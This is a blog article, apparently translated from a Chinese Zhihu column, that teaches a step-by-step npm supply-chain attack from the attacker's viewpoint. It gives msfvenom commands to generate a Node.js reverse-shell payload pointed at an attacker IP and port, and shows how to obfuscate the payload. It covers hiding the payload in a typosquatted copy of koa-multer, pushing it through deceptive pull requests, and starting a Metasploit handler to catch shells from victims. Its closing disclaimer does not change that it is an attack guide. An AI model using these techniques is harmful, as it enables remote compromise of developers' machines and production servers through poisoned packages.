This article was first published in my Zhihu column HackingSexy:zhuanlan.zhihu.com/p/43514079
TL, DR:
This article tells the story from a hacker’s point of view, to penetrate the front-end project, from the generation payload, obvert, hide payload, publish NPM, social engineering PR, run scripts, reverse connect to the attack host, and finally the host gets the server shell.
Feature:
What’s the mantra of front-end engineers? NPM install!
This command downloads a bunch of dependencies declared in the project package.json from the NPM repository. After downloading the dependencies, download the dependencies declared in the dependencies package.json. Then download the dependencies declared by package.json in the dependencies declared by package.json, and download the dependencies at …………
And then there’s a bunch of NPM packages that you don’t know where they came from.
What’s another mantra of front-end engineers? NPM run dev!
Well! The compile successful! A perfect compile! You think it’s time to show real technology!
At this time, at the other end of the network cable, a hacker smiled slightly: there is a chicken online.
What happened in between?
Generated content
Experienced goldfish guys know, to fish, is sure to do the hook first. Hackers want to fish. What’s the hook? In the hacker world, there’s a fishtrap shop called MSfvenom, which concentrates on fish in all forms and forms. Msfvenom is a part of Metasploit that is integrated into the Kali system. At Kali’s official website, there are ready-made virtual machine images that can be downloaded and used.
In Kali’s Terminal type:
msfvenom -l | grep node
You can list all payloads that support Node.js. It’s the equivalent of going into a store and saying, boss! I want a hook! Something that hooks node.js! Boss: Ok. Which paragraph?
In this case, we choose nodejs/ shell_reverse_TCP. The most common payload in the industry is meterpreter, but this hook is not available yet:
How do we generate our payload? Let’s say:
Msfvenom -p nodejs/ shell_reverse_TCP LHOST=192.168.199.165 LPORT=5432 -o index.js
Here are the configuration parameters:
- -p nodejs/ shell_reverse_TCP payload = nodejs/ shell_reverse_TCP payload
- LHOST=192.168.199.165 refers to the IP address of the attacking host. Since this attack was an Intranet demonstration, the Intranet IP address was used. For a public network attack, you need a public IP address.
- LPORT=5432 Listening port on the attacking host. Payload After the operation, the attacked party tries to connect to this port on the attacking host.
- -o index.js means output to the index.js file.
After typing the command, we can get the payload in the current directory named index.js, which is the hook we just bought. Payload is very, very small, only 803 bytes. with
cat index.js
Command, you can see what payload looks like.
At this point, the alert front end will jump out and say, “Chest bottom, your code calls CMD and /bin/sh, and it exposes IP and port attacks. What kind of idiot would run your code?”
Don’t worry. We’re just getting started.
confusion
The traditional antivirus software, is through the detection of specific characters of the file to determine the virus characteristics, and by modifying the signature code to bypass the detection of antivirus software, we call it to avoid killing.
JavaScript, on the other hand, is more flexible than Luffy in One Piece.
For example, a simple line of code:
alert(1)
Using jsFuck can turn it into something your mother wouldn’t recognize:
+ [] [] [] [(!) [+ []] + [[! []] + [] [[]]) [+, + + + [] [] []] + (! [] + []) [! + [] + + []] + (!! [] + []) [[]] + + (!! [] + []) [! + [] +, + + []! + []] + (!! [] + []) + [[+! ]]] [[] [(! [] + []) [+ []] + [[! []] + [] [[]]) [+, + + + [] [] []] + (! [] + []) [! + [] + + []] + (!! [] + []) [[]] + + (!! [] + []) [! + [] +, + + []! + []] + (!! [] + []) [+! + []]] + []) [! + [] +, + + []! + []] + (!! [] + [] [(! [] + []) [+ []] + [[! []] + [] [[]]) [+. + + + [] [] []] + (! [] + []) [! + [] + + []] + (!! [] + []) [[]] + + (!! [] + []) [! + [] +, + + []! + []] + (!! [] + []) [+! + []]]], [+, + + + [] [] []] + [] ([[]] + []) [+! + []] + (! [] + []) [! + [] +, + + []! + []] + (!! [] + []) [[]] + + (!! [] + [] +) [+! + []] ([[]] + [] []) (+ + [] [] [] [(! [] + []) [+ []] + [[! []] + [] [[]]) [+, + + + [] [] []] + (! [] + []) [! + [] + + []] + (!! [] + []) [[]] + + (!! [] + []) + [[! ] +! + [] +, + + []] (!! [] + []) [+! + []]] + []) [! + [] +, + + []! + []] + (!! [] + []) [[]] + + (!! [] + [] [(! [] + []) [+ []] + [[! []] + [] [[]]) [+. + + + [] [] []] + (! ] + []) [! + [] + + []] + (!! [] + []) [[]] + + (!! [] + []) [! + [] +, + + []! + []] + (!! [] + []) [+! + []]]], [+, + + + [] [] []] + (!! [] + []) [+! + []]] ((! [] + []) [+! + []] + (! [] + []) [! + [] + + []] + (!!!!! [] + []) [! + [] +, + + []! + []] + (!!!!! [] + []) [+! + []] + (!!!!! [] + + [] [] []) + (! (! [[] + [] [] []) + + + [] [] [! []] + [] ([[]]) [+, + + + [] [] []] + (! [] + []) [! + [] + + []] + (!! [] + []) [[]] + + (!! [] + []) [! + [] +, + + []! + []] + (!! [] + []) [+ ! + []]]) [! + [] +, + + + [] [] []] + [+! + []] + (!!!!! (! [[] + [] [] []) + + + [] [] [! []] + [] ([[]]) [+, + + + [] [] []] + (! [] + []) [! + [] + + []] + (!! [] + []) [[]] + + (!! [] + []) [! + [] +, + + []! + []] + (!! [] + []) [+ ! + []]]) [! + [] +, + + + [] [] []]) ()Copy the codeWe don’t use jsFuck, of course, because the code after the confusion is too big.
The front-end likes to use UglifyJS to compress the code, but in this scenario, it may not be the optimal solution. We used the JavaScript Obfuscator Tool.
Copy payload, open obfuscator. IO /, paste, choose the Obfuscate method you need to add according to your taste, click Obfuscate, a dish is completed.
Now there are no humans who can read this code, confusing task completion.
Hidden content
NPM is the granary of communism. Anyone can contribute their code to NPM. But how do we get people to download our code? This is an advanced subject.
The general idea is to make a package that looks like a normal NPM package, like koa-multer. You could make a koa_multer, and then someone will typo the package and download it to payload. It’s a matter of probability. The greater the total number of KOa-multers downloaded, the greater the number of Koa_multers downloaded.
In the case of KOA-Multer, let’s download the code Clone.
Git clone github.com/koa-modules…
Copy the payload we generated into the project path and import the file in index.js.
Json and README. Md, change all koa-multer to koa_multer, and declare the filename of payload in package.json files. We make an NPM package with payload.
Get this package and publish it to the NPM source:
npm publish
To demonstrate, I set up a local NPM server.
You can see that the package is almost identical to the correct KOA-Multer. If you don’t dig deep into the source code, the front end won’t realize that it downloaded the wrong package.
The next thing to do is wait. It’s like fishing. It takes patience.
At this point, the alert front end engineer will jump out and say: “You see this package is a fraud, I certainly won’t be stupid enough to install this package!”
Don’t worry, there are other ways.
Another idea is to make a generic NPM package, such as one that can log in all colors, and then give PR to other open source projects:
I fixed the problem XXX for you and added the color Logger function!
We are contributing to the open source community!
Of course, alert people will reject this PR. But it doesn’t matter. There’s a lot of PR, and someone will fall for it.
It’s not a problem for an NPM package to be forged, nor is it a problem for a malicious PR to be approved by an unknown project. Just like one request can’t be called an attack, but when millions of requests come in, you know how terrible DDOS is.
A hacker could automate the logic of downloading an NPM package, faking the code, and distributing it. After that, it’s not just koa_multer. Watch out for koa-multe, multer-koa, koa-multer-middleware, and other weird NPM packages. Also distinguish between “_” and “-, “of course. It’s not just the Koa-Multer package, but all the other packages.
No matter how alert and careful you are, there’s always something you won’t notice. Like Achilles, he will one day get an arrow in his heel.
In addition, most NPM packages are hierarchical dependencies. You can make sure that your package.json does not declare Trojan packages, but can you make sure that the packages you depend on, and the authors of those packages, are as vigilant as you are?
Hackers to prepare
On the hacker side, you need to have handlers ready.
Input:
msfconsole
Enter metasploit’s console. Then type:
use exploit/multi/handler
Use the Handler module. Set payload in the Handler module to attack the host IP address, attack the host port, and enable listening:
Set Payload Nodejs/SHELL_Reverse_TCP set LHOST 192.168.199.165 Set LPORT 5432 run
As shown in the figure, the reverse TCP listener has been started successfully:
Chicken online
At this time, the mouse ran koa_multer in the demo code!
On the hacker side, the shell session is immediately available:
Here, the hacker gains user rights to start the node.js program and execute any command that the user allows. For example, check the OPERATING system and CPU model……
Sysctl -n machdep.cpu.brand_string # Check the operating system
If the program is deployed to a production server, the hacker will be able to gain shell access to the server.
Intranet penetration, stripping, stallion, diversion… You can really do whatever you want with a shell.
The Done?
It’s not over yet. It’s not over yet.
The NPM account has a weak password problem
In July 2017, someone made a weak password detection on NPM’s account, and the detection result was:
Accounts with weak password problems account for 14% of NPM packages posted on the site.
Because NPM packages exist in a form of interdependency, security problems caused by 14% of packages, affecting the other packages, account for 54% of the entire site.
That means that for every two NPM installments you have, one will be installed to an insecure package. This is not alarmist. Famous koA.js, posted the password” password”; Star projects such as React and GULP are not immune. Here are some other NPM packages that are affected by the weak password problem, some of which you may be familiar with:
- debug
- qs
- yargs
- request
- chalk
- form-data
- cheerio
- gulp
- browserify
- bower
- mongoose
- electron
- normalize.css
- mysql
NPM has not had a major security problem until now, which is a matter of good luck.
So let’s wish NPM luck forever.
Note: This article is intended for discussion, the author has not penetrated any system. If the ideas of this article are infiltrated, the reader must bear his own risk and responsibility. The author assumes no responsibility whatsoever.
Reference documents:
- Hackernoon.com/im-harvesti…
- Github.com/ChALkeR/not…